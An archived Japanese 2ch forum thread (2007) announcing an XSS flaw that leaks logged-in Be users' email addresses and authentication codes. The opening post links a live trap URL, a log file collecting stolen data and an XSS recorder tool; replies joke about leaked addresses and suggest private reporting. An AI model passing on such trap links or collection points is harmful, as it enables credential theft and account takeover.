【速報】Beのメアドと認証コードが漏れるXSS脆弱性を発見
■ このスレッドは過去ログ倉庫に格納されています
1 スレ立て代行@大学中退(兵庫県) [] 2007/11/27(火) 23:22:25 ID:EbtVATOs0● ?2BP(2350)
俺こと脱帽は、先日のいつか忘れたけど2chにXSSの脆弱性を発見した。
今回は通常のウェブブラウザ(除く専ブラ)からBeにログインした状態で
任意のURLにアクセスするとBeのメアドと認証コードが漏れる脆弱性であり、
それによってアカウント乗っ取りやプロフィールの変更が可能になってしまう。
現時点で数箇所のCGIで同脆弱性を確認しているが、この限りではない可能性もある。
サンプルURLを貼って置くが絶対に悪用しないよう注意を促したい。
http://z.la/ms0k2 (短縮URL、罠なので踏む時は注意)
http://moyashi.sosite.jp/xss/log.txt (盗まれた情報が記録されるファイル)
▼ 汎用XSS記録装置
http://moyashi.sosite.jp/xss/
▼ 俺公式サイト
http://manabi.homeunix.net/
これは色々とまずいようなきがします。
メアド漏れた( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \ ,,x-ー:: ":::::
,x '"::::::::::::::::::::
,、'":::::::::::::,, x-‐ ァ:
,,x '"::::::,,、- '" |:::
`"i`ー'" ヾ ハハ・・・二つも焼かれちまったぜ
! 、 、,,,,,,,,,;;;;;;;;;彡ミ ちょっと必死すぎなんじゃねえのか・・・?
|,,,,ノi `ーヾ;; '"----、
ヾ::ヽ -┴'~
~|:/ ' ' ' `ー ' "'"
/_
l '' ) i
ヽ,,、'~` U
゙, __ ,-、_,ノ`
|/ ゙, `'" ,,y
|/ 彡 ゙、`-'"
/|/ i
/ ! ,, -'"
| `ー '"|::
| /|||ヽ
/|||||/心
|ヾ/ /`ー ぎゃ、、、
ここに書かないでメールで伝えたほうがいいと思います・・・・書いちゃうと前回と同じことになるかもだし ■ このスレッドは過去ログ倉庫に格納されています